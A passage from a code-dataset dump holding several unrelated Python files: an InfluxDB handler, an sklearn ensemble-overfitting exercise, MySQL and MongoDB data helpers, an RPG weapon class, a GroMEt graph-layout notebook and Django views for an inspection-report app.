self.influxClient.switch_database(database)\n\n self.logging = logging\n self.traceback = traceback\n self.logging.basicConfig(filename=\"error.log\")\n\n self.topic = topic\n self.status_checker = []\n\n switch = {\n \"ph\": \"pH\",\n \"tb\": \"NTU\",\n \"temp\": \"Celsius\",\n \"do\":\"mg/L\"\n }\n self.unit = switch.get(topic, \"No unit\")\n del switch\n\n self.value_serializer = self.json_serializer(self.topic, self.unit)\n self.status_serializer = self.json_serializer(\n \"{}_status\".format(self.topic), self.unit)\n\n def json_serializer(self, measurement, tag):\n def serialize(field):\n return {\n \"measurement\": measurement,\n \"tags\": {\n \"unit\": tag\n },\n \"fields\": {\n \"value\": field\n }\n }\n return serialize\n\n def dbsend(self, recieved_list):\n try:\n self.influxClient.write_points(\n getattr(handler, recieved_list[\"status\"])(\n self, [], recieved_list),\n time_precision='ms', protocol='json')\n# second parameter of getattr must always be empty list since the function needs an empty lists\n except Exception as e:\n print(\"failed to write to DB topic %s\" % self.topic)\n print(e)\n self.logging.error(self.traceback.format_exc())\n\n def sending(self, *args):\n args[0].append(self.value_serializer(args[1][\"value\"]))\n if len(self.status_checker) < 1:\n args[0].append(self.status_serializer(\"connected\"))\n self.status_checker.append(\"placeholder\")\n return args[0]\n\n def connected(self, *args):\n self.status_checker.append(\"placeholder\")\n if len(self.status_checker) == 1:\n args[0].append(self.status_serializer(\"connected\"))\n print(\"connected %s\" % self.topic)\n return args[0]\n\n def disconnected(self, *args):\n try:\n self.status_checker.pop(0)\n except:\n pass\n if len(self.status_checker) < 1:\n args[0].append(self.status_serializer(\"disconnected\"))\n print(\"disconnected %s\" % self.topic)\n return args[0]\n","sub_path":"influxHandler_v1.py","file_name":"influxHandler_v1.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"84752759","text":"# %% [markdown]\n# # 📃 Solution for Exercise M6.03\n#\n# This exercise aims at verifying if AdaBoost can over-fit.\n# We will make a grid-search and check the scores by varying the\n# number of estimators.\n#\n# We will first load the California housing dataset and split it into a\n# training and a testing set.\n\n# %%\nfrom sklearn.datasets import fetch_california_housing\nfrom sklearn.model_selection import train_test_split\n\ndata, target = fetch_california_housing(return_X_y=True, as_frame=True)\ntarget *= 100 # rescale the target in k$\ndata_train, data_test, target_train, target_test = train_test_split(\n data, target, random_state=0, test_size=0.5)\n\n# %% [markdown]\n# ```{note}\n# If you want a deeper overview regarding this dataset, you can refer to the\n# Appendix - Datasets description section at the end of this MOOC.\n# ```\n\n# %% [markdown]\n# Then, create an `AbaBoostRegressor`. Use the function\n# `sklearn.model_selection.validation_curve` to get training and test scores\n# by varying the number of estimators.\n# *Hint: vary the number of estimators between 1 and 60.*\n\n# %%\nimport numpy as np\nfrom sklearn.ensemble import AdaBoostRegressor\nfrom sklearn.model_selection import validation_curve\n\nadaboost = AdaBoostRegressor()\nparam_range = np.unique(np.logspace(0, 1.8, num=30).astype(int))\ntrain_scores, test_scores = validation_curve(\n adaboost, data_train, target_train, param_name=\"n_estimators\",\n param_range=param_range, n_jobs=-1)\n\n# %% [markdown]\n# Plot both the mean training and test scores. You can also plot the\n# standard deviation of the scores.\n\n# %%\nimport matplotlib.pyplot as plt\n\nplt.errorbar(param_range, train_scores.mean(axis=1),\n yerr=train_scores.std(axis=1), label=\"Training score\",\n alpha=0.7)\nplt.errorbar(param_range, test_scores.mean(axis=1),\n yerr=test_scores.std(axis=1), label=\"Cross-validation score\",\n alpha=0.7)\n\nplt.legend()\nplt.ylabel(\"$R^2$ score\")\nplt.xlabel(\"# estimators\")\n_ = plt.title(\"Validation curve for AdaBoost regressor\")\n\n# %% [markdown]\n# Plotting the validation curve, we can see that AdaBoost is not immune against\n# overfitting. Indeed, there is an optimal number of estimators to be found.\n# Adding too many estimators is detrimental for the performance of the model.\n\n# %% [markdown]\n# Repeat the experiment using a random forest instead of an AdaBoost regressor.\n\n# %%\nfrom sklearn.ensemble import RandomForestRegressor\n\nforest = RandomForestRegressor()\ntrain_scores, test_scores = validation_curve(\n forest, data_train, target_train, param_name=\"n_estimators\",\n param_range=param_range, n_jobs=-1)\n\n# %%\nplt.errorbar(param_range, train_scores.mean(axis=1),\n yerr=train_scores.std(axis=1), label=\"Training score\",\n alpha=0.7)\nplt.errorbar(param_range, test_scores.mean(axis=1),\n yerr=test_scores.std(axis=1), label=\"Cross-validation score\",\n alpha=0.7)\n\nplt.legend()\nplt.ylabel(\"$R^2$ score\")\nplt.xlabel(\"# estimators\")\n_ = plt.title(\"Validation curve for RandomForest regressor\")\n\n# %% [markdown]\n# In contrary to the AdaBoost regressor, we can see that increasing the number\n# trees in the forest will increase the statistical performance of the random\n# forest. In fact, a random forest has less chance to suffer from overfitting\n# than AdaBoost when increasing the number of estimators.\n","sub_path":"python_scripts/ensemble_sol_03.py","file_name":"ensemble_sol_03.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"409896800","text":"\n\nimport pymysql\n\ndb = pymysql.connect('localhost', 'root', '123456',\n 'dict_pro', charset='utf8')\ncursor = db.cursor()\n\n# sql = 'create table user(\\\n# id int primary key auto_increment,\\\n# name varchar(20),\\\n# passwd varchar(16)\\\n# ) default charset=utf8;'\n\n# sql = 'create table record(\\\n# id int primary key auto_increment,\\\n# word varchar(32),\\\n# time timestamp,\\\n# user_id int,\\\n# foreign key(user_id) references user(id)\\\n# on delete cascade\\\n# on update cascade\\\n# ) default charset=utf8;'\n\nsql = 'create table dict(\\\n id int primary key auto_increment,\\\n word varchar(32),\\\n interpret varchar(300)\\\n ) default charset=utf8;'\n\ncursor.execute(sql)\n\ndb.commit()\ncursor.close()\ndb.close()\n","sub_path":"Project/Ele_Dict/v1_0/init_db/creat_usedb.py","file_name":"creat_usedb.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"594608428","text":"from .. import models\nfrom .. import common\nimport qmongo\ndef display_list_job_working(group_code):\n ret=qmongo.models.HCSLS_JobWorking.aggregate\n ret.join(qmongo.models.HCSLS_JobWorkingGroup, \"gjw_code\", \"gjw_code\", \"jwg\")\n ret.left_join(qmongo.models.HCSEM_Employees, \"report_to_job_w\", \"employee_code\", \"emp\")\n if group_code != None and group_code != \"\":\n ret.match('jwg.level_code == {0}', group_code)\n ret.project(\n job_w_code=\"job_w_code\",\n job_w_name=\"job_w_name\",\n report_to_job_w=\"emp.last_name + emp.first_name\",\n lock = \"lock\",\n ordinal=\"ordinal\"\n )\n ret.sort(dict(\n ordinal = 1\n ))\n\n return ret\n\ndef get_job_working_group_by_group_code(gjw_code):\n rs = qmongo.models.HCSLS_JobWorkingGroup.aggregate.project(gjw_code = 1, gjw_name = 1, ordinal = 1).match(\"gjw_code == {0}\", gjw_code).sort({\"ordinal\":1}).get_item()\n return rs\n\ndef get_job_description_by_job_working_code(job_w_code):\n ret=qmongo.models.HCSLS_JobWorking.aggregate\n ret.join(qmongo.models.HCSLS_JobWorkingGroup, \"gjw_code\", \"gjw_code\", \"gjw\")\n ret.left_join(qmongo.models.auth_user_info, \"created_by\", \"username\", \"uc\")\n ret.left_join(qmongo.models.auth_user_info, \"modified_by\", \"username\", \"um\")\n ret.project(\n job_w_code=\"job_w_code\",\n job_w_name=\"job_w_name\",\n job_w_name2=\"job_w_name2\",\n gjw_code=\"gjw_code\",\n gjw_name=\"gjw.gjw_name\",\n effect_date=\"effect_date\",\n job_pos_code=\"job_pos_code\",\n is_job_w_main_staff=\"is_job_w_main_staff\",\n report_to_job_w=\"report_to_job_w\",\n dept_contact=\"dept_contact\",\n dept_apply=\"dept_apply\",\n job_w_next=\"job_w_next\",\n job_w_change=\"job_w_change\",\n description=\"description\",\n job_w_duty=\"job_w_duty\",\n ordinal=\"ordinal\",\n lock=\"lock\",\n created_by=\"uc.login_account\",\n created_on=\"created_on\",\n modified_on=\"switch(case(modified_on!='',modified_on),'')\",\n modified_by=\"switch(case(modified_by!='',um.login_account),'')\",\n )\n ret.match(\"job_w_code == {0}\", job_w_code)\n ret.sort(dict(\n ordinal = 1\n ))\n\n return ret\n\ndef get_list_permission_and_mission_by_job_working_code(job_w_code,search_text):\n ret=qmongo.models.HCSLS_JobWorking.aggregate\n ret.match(\"job_w_code == {0}\", job_w_code)\n ret.unwind(\"task\")\n ret.left_join(qmongo.models.auth_user_info, \"created_by\", \"username\", \"uc\")\n ret.left_join(qmongo.models.auth_user_info, \"modified_by\", \"username\", \"um\")\n ret.project(\n job_w_code=\"job_w_code\",\n rec_id =\"task.rec_id\",\n task_name=\"task.task_name\",\n weight=\"task.weight\",\n description=\"task.description\",\n ordinal=\"task.ordinal\",\n created_by=\"uc.login_account\",\n created_on=\"task.created_on\",\n modified_on=\"switch(case(task.modified_on!='',task.modified_on),'')\",\n modified_by=\"switch(case(task.modified_by!='',um.login_account),'')\",\n )\n if(search_text!= None and search_text!= ''):\n ret.match(\"contains(task_name,{0}) or contains(description,{0})\",search_text)\n ret.match(\"task_name != {0}\", None)\n ret.sort(dict(\n ordinal = 1\n ))\n\n return ret\n\ndef insert_job_description(args, task):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n { \"job_w_code\": args['data']['job_w_code'] },\n {\n '$push': {\n \"task\": task\n }\n }\n )\n return ret\n\ndef insert_job_kpi(args, task):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n { \"job_w_code\": args['data']['job_w_code'] },\n {\n '$push': {\n \"kpi\": task\n }\n }\n )\n return ret\n\ndef remove_job_description(args):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n {\n \"job_w_code\": args['data']['job_w_code']\n },\n {\n '$pull':{\"task\" :{ \"rec_id\": {'$in': args['data']['rec_id']}}}\n }, \n True\n )\n return ret\n\ndef remove_kpi(args):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n {\n \"job_w_code\": args['data']['job_w_code']\n },\n {\n '$pull':{\"kpi\" :{ \"rec_id\": {'$in': args['data']['rec_id']}}}\n }, \n True\n )\n return ret\n\ndef update_job_description(args, task):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n {\n \"job_w_code\": args['data']['job_w_code'],\n \"task\":{\n \"$elemMatch\":{\n \"rec_id\":args['data']['task'][\"rec_id\"]\n }\n }\n },\n {\n \"$set\": {\n 'task.$.task_name': task['task_name'],\n 'task.$.weight': task['weight'],\n 'task.$.description': task['description'],\n 'task.$.ordinal': task['ordinal'],\n 'task.$.modified_by': task['modified_by'],\n 'task.$.modified_on': task['modified_on']\n }\n })\n return ret\n\ndef update_job_kpi(args, kpi):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n {\n \"job_w_code\": args['data']['job_w_code'],\n \"kpi\":{\n \"$elemMatch\":{\n \"rec_id\":args['data']['kpi'][\"rec_id\"]\n }\n }\n },\n {\n \"$set\": {\n 'kpi.$.kpi_name': kpi['kpi_name'],\n 'kpi.$.ordinal': kpi['ordinal'],\n 'kpi.$.unit': kpi['unit'],\n 'kpi.$.cycle': kpi['cycle'],\n 'kpi.$.weight': kpi['weight'],\n 'kpi.$.modified_by': kpi['modified_by'],\n 'kpi.$.modified_on': kpi['modified_on']\n }\n })\n return ret\n\ndef insert_evaluation_factor(args, factor_appraisal):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n { \"job_w_code\": args['data']['job_w_code'] },\n {\n '$push': {\n \"factor_appraisal\": factor_appraisal\n }\n }\n )\n return ret\n\ndef update_evaluation_factor(args, factor_appraisal):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n {\n \"job_w_code\": args['data']['job_w_code'],\n \"factor_appraisal\":{\n \"$elemMatch\":{\n \"rec_id\":args['data']['factor_appraisal'][\"rec_id\"]\n }\n }\n },\n {\n \"$set\": {\n 'factor_appraisal.$.factor_code': factor_appraisal['factor_code'],\n 'factor_appraisal.$.weight': factor_appraisal['weight'],\n 'factor_appraisal.$.modified_by': factor_appraisal['modified_by'],\n 'factor_appraisal.$.modified_on': factor_appraisal['modified_on']\n }\n })\n return ret\n\ndef delete_evaluation_factor(args):\n collection = common.get_collection('HCSLS_JobWorking')\n ret = collection.update(\n {\n \"job_w_code\": args['data']['job_w_code']\n },\n {\n '$pull':{\"factor_appraisal\" :{ \"rec_id\": {'$in': args['data']['rec_id']}}}\n }, \n True\n )\n return ret\n\ndef get_list_job_specific_by_job_working_code(job_w_code):\n pass\n\ndef get_list_evaluation_factor_by_job_working_code(job_w_code):\n ret=qmongo.models.HCSLS_JobWorking.aggregate\n ret.match(\"job_w_code == {0}\", job_w_code)\n ret.unwind(\"factor_appraisal\")\n ret.join(qmongo.models.TMLS_FactorAppraisal, \"factor_appraisal.factor_code\", \"factor_code\", \"fac\")\n ret.join(qmongo.models.TMLS_FactorAppraisalGroup, \"fac.factor_group_code\", \"factor_group_code\", \"fac_g\")\n ret.left_join(qmongo.models.auth_user_info, \"created_by\", \"username\", \"uc\")\n ret.left_join(qmongo.models.auth_user_info, \"modified_by\", \"username\", \"um\")\n ret.project(\n job_w_code=\"job_w_code\",\n rec_id =\"factor_appraisal.rec_id\",\n factor_code=\"factor_appraisal.factor_code\",\n factor_name=\"fac.factor_name\",\n factor_group_name=\"fac_g.factor_group_name\",\n weight=\"factor_appraisal.weight\",\n created_by=\"uc.login_account\",\n created_on=\"factor_appraisal.created_on\",\n modified_on=\"switch(case(factor_appraisal.modified_on!='',factor_appraisal.modified_on),'')\",\n modified_by=\"switch(case(factor_appraisal.modified_by!='',um.login_account),'')\",\n )\n ret.match(\"factor_code != {0}\", None)\n ret.sort(dict(\n ordinal = 1\n ))\n\n return ret\n\ndef get_evaluation_file_by_job_working_code(job_w_code):\n pass","sub_path":"apps/performance/api/Query/JobWorking.py","file_name":"JobWorking.py","file_ext":"py","file_size_in_byte":9618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"331078814","text":"from random import choice\nfrom Dice_Rolling import d4, d6, d8, d10, d12\n\nmelee = 0\nranged = 1\n\nslashing = 0\npiercing = 1\nbludgeoning = 2\n\nfinesse = 0\nheavy = 1\nlight = 2\nloading = 3\nreach = 4\nthrown = 5\ntwo_handed = 6\nversatile = 7\n\n\nclass Weapon:\n def __init__(self, die, num_dice, d_type, m_range, properties):\n self.damage = d_type\n self.range = m_range\n self.properties = properties\n self.die = die\n self.num_dice = num_dice\n\n def attack(self, abilities: list, reroll=False, twohand=False):\n mod = self.primary_mod(abilities)\n damage = mod\n damage_die = self.die\n if twohand and versatile in self.properties:\n if damage_die == d4:\n damage_die = d6\n elif damage_die == d6:\n damage_die = d8\n elif damage_die == d8:\n damage_die = d10\n elif damage_die == d10:\n damage_die = d12\n for _ in range(self.num_dice):\n roll = choice(damage_die)\n if not reroll:\n damage += roll\n elif roll > 2:\n damage += roll\n else:\n damage += choice(damage_die)\n return damage\n\n def primary_mod(self, abilities: list):\n mod = abilities[0]\n if self.range == melee and (finesse in self.properties and abilities[1] > abilities[0]):\n mod = abilities[1]\n return (mod - 10) // 2\n\n\nwarhammer = Weapon(d8, 1, bludgeoning, melee, [versatile])\nlongsword = Weapon(d8, 1, slashing, melee, [versatile])\nbattleaxe = Weapon(d8, 1, slashing, melee, [versatile])\nmaul = Weapon(d6, 2, bludgeoning, melee, [two_handed, heavy])\ngreatsword = Weapon(d6, 2, slashing, melee, [two_handed, heavy])\ngreataxe = Weapon(d12, 1, slashing, melee, [two_handed, heavy])\nflail = Weapon(d8, 1, bludgeoning, melee, [])\nshortsword = Weapon(d6, 1, piercing, melee, [finesse, light])\nspear = Weapon(d6, 1, piercing, melee, [thrown, versatile])\n","sub_path":"Weapons.py","file_name":"Weapons.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"153376692","text":"# %%[markdown]\n# Author: Nelson Liu \n#\n# Email: [nliu@uncharted.software](mailto:nliu@uncharted.software)\n\n# %%[markdown]\n# Content:\n# * Parse directly the \"loop\" and CHIME GroMEt examples from UAZ/Clay\n# * \n\n# %%\nimport os\nimport json\nimport networkx as nx\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom typing import Dict, Tuple, Any, Optional\n\n# %%[markdown]\n# # Run the Dario parser over the GroMEt\n\ndeno_command = 'deno run --allow-write --allow-read'\nparser_path = '/home/nliu/projects/aske/research/gromet/tools/parse.ts'\ndata_dir = '/home/nliu/projects/aske/research/gromet/data/uaz/'\ndist_dir = '/home/nliu/projects/aske/research/gromet/dist/uaz/'\n\ngromet = []\ngraph = []\nfor p in ('loop/loop_ex2_gromet_FunctionNetwork_correction', 'conditional/cond_ex1_gromet_FunctionNetwork', 'CHIME/CHIME_SIR_v01_gromet_FunctionNetwork_by_hand'):\n\n gromet_path = data_dir + f'{p}.json'\n graph_path = dist_dir + f'{p}_graph.json'\n\n __ = os.system(deno_command + ' ' + parser_path + ' ' + gromet_path + ' ' + graph_path)\n\n with open(gromet_path, 'r') as f:\n gromet.append(json.load(f))\n\n with open(graph_path, 'r') as f:\n graph.append(json.load(f))\n\n\ndeno_command = parser_path = data_dir = dist_dir = gromet_path = f = p = None\ndel deno_command, parser_path, data_dir, dist_dir, gromet_path, f, p\n\n# %%\n\n\n# \"W:loop_ex2.loop_1.e\"\n# \"W:loop_1.loop_1_cond.e\"\n# \"wires\": [\n# \"W:loop_ex2.loop_1.e\",\n# \"W:loop_ex2.loop_1.k\",\n# \"W:loop_1.loop_ex2.k\"\n# ],\n\n\n# gromet_loop['wires'][0]['tgt'] = 'P:loop_1.in.e'\n# gromet_loop['wires'][1]['src'] = 'P:loop_1.in.e'\n\n# %%\n# Calculate hierarchy level of a node from its ID (e.g. \"0::12:11\" = 0 -> 12 -> 11)\ndef calculate_node_level(node_id: str) -> int:\n\n node_level = len(node_id.split('::')) - 1\n\n return node_level\n\n# Get children of all nodes in graph\ndef get_node_children(graph: Dict) -> Dict:\n\n node_children = {node['id']: [] for node in graph['nodes']}\n for node in graph['nodes']:\n if node['parent'] != None:\n node_children[node['parent']].append(node['id'])\n\n return node_children\n\n# Get children of all nodes in NX graph object\ndef get_node_children_nx(G: Dict) -> Dict:\n\n node_children = {node['id']: [] for node in G.nodes}\n for node in G.nodes:\n if G.nodes[node]['parent'] != None:\n node_children[G.nodes[node]['parent']].append(node)\n\n return node_children\n\n# Get all descendants of every node in NX graph object\ndef get_node_descendants_nx(G: Dict) -> Dict:\n\n node_descendants = {node: [] for node in G.nodes}\n for node in G.nodes:\n k = node.split('::')[:-1]\n for i in range(1, len(k) + 1):\n node_parent = '::'.join(k[0:i])\n if node_parent in node_descendants.keys():\n node_descendants[node_parent].append(node)\n\n return node_descendants\n\n# Generate NX Object from a parsed GroMEt\ndef generate_nx_obj(graph: Dict) -> Any:\n\n # Missing graph metadata (lost during Dario parsing)\n G = nx.MultiDiGraph(\n uid = None, \n type = None, \n name = None,\n metadata = graph['metadata']\n )\n\n # Add nodes\n G.add_nodes_from([(node['id'], {**node}) for node in graph['nodes']])\n\n # Add edges\n G.add_edges_from([(edge['source'], edge['target'], {'weight': 1}) for edge in graph['edges']])\n\n return G\n\n# Add equi-level edges\n# If an edge exists between a level-k node and a level-(k + 1) one, \n# add an edge between the level-k node and the level-k parent of the other\ndef add_missing_edges(G: Any) -> Any:\n\n edges = []\n for edge in G.edges:\n\n m = calculate_node_level(edge[0])\n n = calculate_node_level(edge[1])\n \n if m != n:\n \n i = np.argmin([m, n])\n if i == 0:\n src = G.nodes[edge[0]]['id']\n tgt = G.nodes[edge[1]]['parent']\n else:\n src = G.nodes[edge[0]]['parent']\n tgt = G.nodes[edge[1]]['id']\n\n if src != tgt:\n edges.append((src, tgt, 0))\n\n\n G.add_edges_from(edges, weight = 0)\n\n return None\n\n# Promote edges between nodes of different parent nodes to edges between the parent nodes\n# e.g. \"0::1::2\"->\"0::2::3\" becomes \"0::1\"->\"0::2\"\n# \"0::3\"->\"0:28:27\" becomes \"0::3\"->\"0:28\"\ndef promote_edges(G: Any) -> Any:\n\n edges_remove = []\n edges_add = []\n\n for edge in G.edges:\n src_parent = G.nodes[edge[0]]['parent']\n tgt_parent = G.nodes[edge[1]]['parent']\n\n if src_parent != tgt_parent:\n\n m = calculate_node_level(edge[0])\n n = calculate_node_level(edge[1])\n \n if m != n:\n k = min([m, n]) + 1\n src = '::'.join(edge[0].split('::')[:k])\n tgt = '::'.join(edge[1].split('::')[:k])\n edges_add.append((src, tgt))\n\n else:\n edges_add.append((src_parent, tgt_parent))\n\n edges_remove.append(edge)\n\n\n G.remove_edges_from(edges_remove)\n G.add_edges_from(edges_add, weight = -1)\n\n return None\n\n# Generate linear layout from a NetworkX graph using condensation & topological sorting\ndef generate_linear_layout(G: Any, offset: Optional[Dict] = None, draw: Optional[bool] = False, ax: Optional[Any] = None) -> Any:\n\n # Condense graph to a DAG and topologically sort it\n G_cond = nx.condensation(G)\n S = nx.topological_sort(G_cond)\n\n # Generate x-coordinates by offset or at least 1\n k = 0\n pos = {}\n for i in S:\n for node_id in G_cond.nodes[i]['members']:\n pos[node_id] = np.array([k, 0])\n\n if offset != None:\n k += max([offset[node_id], 1])\n else:\n k += 1\n if draw == True:\n\n if ax == None:\n fig, ax = plt.subplots(nrows = 1, ncols = 1, figsize = (20, 5))\n\n __ = draw_graph(G, pos = pos, ax = ax, G_full = G)\n\n return pos\n\n# Draw NX Object\ndef draw_graph(G: Any, pos: Dict, ax: Optional[Any] = None, node_args: Optional[Dict] = None, edge_args: Optional[Dict] = None, label_args: Optional[Dict] = None, legend_args: Optional[Dict] = None, G_full: Optional[Any] = None, label_key: Optional[str] = 'label') -> Any:\n\n if ax == None:\n fig, ax = plt.subplots(nrows = 1, ncols = 1, figsize = (20, 5))\n\n if node_args == None:\n\n if G_full == None:\n node_types = {t: i for i, t in enumerate(np.unique([G.nodes[node]['nodeType'] for node in G.nodes]))}\n else:\n node_types = {t: i for i, t in enumerate(np.unique([G_full.nodes[node]['nodeType'] for node in G_full.nodes]))}\n \n node_args = {\n # 'node_size': [len(get_node_children_nx(G, node_id = node)) for node in G.nodes],\n 'node_size': [100 for node in G.nodes],\n 'node_color': [node_types[G.nodes[node]['nodeType']] for node in G.nodes],\n 'cmap': 'tab10',\n 'vmin': 0,\n 'vmax': 9,\n }\n node_norm = mpl.colors.Normalize(vmin = 0, vmax = 9)\n node_cmap = mpl.cm.get_cmap(node_args['cmap'])\n\n if edge_args == None:\n edge_args = {\n 'edge_color': 'tab:gray',\n 'alpha': 0.5,\n 'connectionstyle': 'arc3,rad=0.15',\n }\n\n if label_args == None:\n label_args = {\n 'font_color': 'black',\n 'font_size': 10,\n 'horizontalalignment': 'left', \n 'verticalalignment': 'bottom',\n 'labels': {node: G.nodes[node][label_key] for node in G.nodes},\n }\n\n if legend_args == None:\n\n if len(node_args) > 0:\n\n legend_elements = [\n mpl.lines.Line2D(\n [0], [0], marker = 'o', color = 'w', label = t, markersize = 20,\n markerfacecolor = node_cmap(node_norm(val))\n ) for t, val in node_types.items()\n ]\n\n legend_args = {\n 'loc': 'lower right',\n 'ncol': len(legend_elements)\n }\n\n if len(node_args) > 0:\n h_nodes = nx.draw_networkx_nodes(G, pos = pos, ax = ax, **node_args)\n\n if len(edge_args) > 0:\n h_edges = nx.draw_networkx_edges(G, pos = pos, ax = ax, **edge_args)\n\n if len(label_args) > 0:\n h_labels = nx.draw_networkx_labels(G, pos = pos, ax = ax, **label_args)\n __ = [t.set_rotation(15) for __, t in h_labels.items()]\n\n __ = plt.setp(ax, ylim = (-3, 3))\n\n if len(legend_args) > 0:\n # ax.legend(handles = legend_elements, loc = 'lower right', ncol = len(legend_elements))\n ax.legend(handles = legend_elements, **legend_args)\n\n\n return None\n\n# Generate linear layout that is layered by the parent-child hierarchy of the graph\ndef generate_linear_layout_with_hierarchy(G: Any, draw: Optional[bool] = False, ax: Optional[Any] = None) -> Dict:\n\n if (draw == True) & (ax == None):\n fig, ax = plt.subplots(nrows = 1, ncols = 1, figsize = (20, 5))\n\n pos_full = {None: np.array([0, -1])}\n max_node_level = max([calculate_node_level(node) for node in G.nodes])\n\n node_descendants = get_node_descendants_nx(G)\n num_descendants = {node: len(l) for node, l in node_descendants.items()}\n\n\n for l in range(max_node_level + 1):\n\n nodes = [node for node in G.nodes if calculate_node_level(node) == l]\n parents = set([G.nodes[node]['parent'] for node in nodes])\n\n for parent in parents:\n\n nodes_ = [node for node in G.nodes if G.nodes[node]['parent'] == parent]\n G_sub = G.subgraph(nodes_)\n pos = generate_linear_layout(G = G_sub, offset = num_descendants)\n pos = {k: v + pos_full[parent] + np.array([0, 1]) for k, v in pos.items()}\n pos_full = {**pos_full, **pos}\n\n if draw == True:\n __ = draw_graph(G_sub, pos = pos, ax = ax, G_full = G)\n\n if draw == True:\n __ = plt.setp(ax, ylim = (-1, max_node_level + 1))\n \n return pos_full\n\n\n# %%\n\nG = generate_nx_obj(graph = graph[0])\n\nG.remove_edge('0::6::14', '0::6::5')\nG.remove_edge('0::6::15', '0::6::13')\nG.remove_edge('0::6::10', '0::6::8')\n\n__ = add_missing_edges(G = G)\n__ = promote_edges(G = G)\n# __ = generate_linear_layout(G, draw = True)\n\n__ = generate_linear_layout_with_hierarchy(G, draw = True)\n\n# %%\n\nG = generate_nx_obj(graph = graph[1])\n\n__ = add_missing_edges(G = G)\n__ = promote_edges(G = G)\n# __ = generate_linear_layout(G, draw = True)\n\n__ = generate_linear_layout_with_hierarchy(G, draw = True)\n\n\n# %%\nG = generate_nx_obj(graph = graph[2])\n\n__ = add_missing_edges(G = G)\n__ = promote_edges(G = G)\n# __ = generate_linear_layout(G, draw = True)\n\n__ = generate_linear_layout_with_hierarchy(G, draw = True)\n\n\n# %%\n","sub_path":"gromet/notebooks/8_uaz_gromet_testing.py","file_name":"8_uaz_gromet_testing.py","file_ext":"py","file_size_in_byte":10745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"94588924","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.forms import inlineformset_factory\nfrom django.contrib.auth.forms import UserCreationForm\n\nfrom django.contrib.auth.models import Group\nfrom django.urls import reverse\n\nfrom datetime import timedelta, date, time\nfrom django.conf import settings\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template\nfrom xhtml2pdf import pisa\nfrom django.contrib.staticfiles import finders\nimport csv\n#from .doctest import report\n# Create your views here.\nfrom .models import *\nfrom .forms import *\n#from .filters import InspectionFilter\n\n\n\n# Create your views here.\ndef home(request):\n\n\toperation = Operation.objects.all()\n\tinspection = Inspection.objects.all()\n\n\n\tcontext = {'operation':operation, 'inspection':inspection}\n\n\treturn render(request, 'report/home.html', context)\n\n\ndef prework(request):\n\n\treturn render(request, 'report/prework.html')\n\n\ndef inspectionDetail(request, pk):\n\tblade = Blade.objects.get(id=pk)\n\n\tinspection = blade.inspection_set.all()\n\n\t#report(operation, inspection)\n\n\t\n\n\tcontext = {'blade':blade, 'inspection':inspection}\n\treturn render(request, 'report/inspection_detail.html', context)\n\ndef bladeDetail(request, pk):\n\toperation = Operation.objects.get(id=pk)\n\n\tblades = operation.blade_set.all()\n\n\t#report(operation, inspection)\n\n\t\n\n\tcontext = {'operation':operation, 'blades':blades}\n\treturn render(request, 'report/blade_detail.html', context)\n\ndef createOperation(request):\n\tform = OperationForm()\n\n\tif request.method == 'POST':\n\t\tform = OperationForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('/')\n\t\t\t\n\tcontext = {'form':form}\n\treturn render(request, 'report/operation_form.html', context)\n\ndef createBlade(request, pk):\n\tBladeFormset = inlineformset_factory(Operation, Blade, fields='__all__', extra=3)\n\toperation = Operation.objects.get(id=pk)\n\tformset = BladeFormset(queryset=Blade.objects.none(), instance=operation)\n\n\tif request.method == 'POST':\n\t\tform = BladeForm(request.POST)\n\t\tformset = BladeFormset(request.POST, instance=operation)\n\n\t\tif formset.is_valid():\n\t\t\tformset.save()\n\t\t\treturn redirect('/')\n\t\t\t\n\tcontext = {'form':formset}\n\treturn render(request, 'report/blade_form.html', context)\n\n\ndef createInspection(request, pk):\n\tInspectionFormSet = inlineformset_factory(Blade, Inspection, fields='__all__', extra=3) \n\tblade = Blade.objects.get(id=pk)\n\tformset = InspectionFormSet(queryset=Inspection.objects.none(), instance=blade)\n\t#form = InspectionForm()\n\n\tif request.method == 'POST':\n\t\tform = InspectionForm(request.POST)\n\t\tformset = InspectionFormSet(request.POST, instance=blade)\n\t\tif formset.is_valid():\n\t\t\tformset.save()\n\t\t\treturn redirect('/')\n\n\t\t# if form.is_valid():\n\t\t# \tform.save()\n\t\t# \treturn redirect('/')\n\n\tcontext = {'form':formset}\n\treturn render(request, 'report/inspection_form.html', context)\n\n\ndef updateOperation(request, pk):\n\toperation = Operation.objects.get(id=pk)\n\tform = OperationForm(instance=operation)\n\n\tif request.method == 'POST':\n\n\t\tform = OperationForm(request.POST, instance=operation)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('/')\n\n\tcontext = {'form':form}\n\treturn render(request, 'report/operation_form.html', context)\n\ndef updateBlade(request, pk):\n\tblade = Blade.objects.get(id=pk)\n\tform = BladeForm(instance=blade)\n\n\tif request.method == 'POST':\n\n\t\tform = BladeForm(request.POST, instance=blade)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn 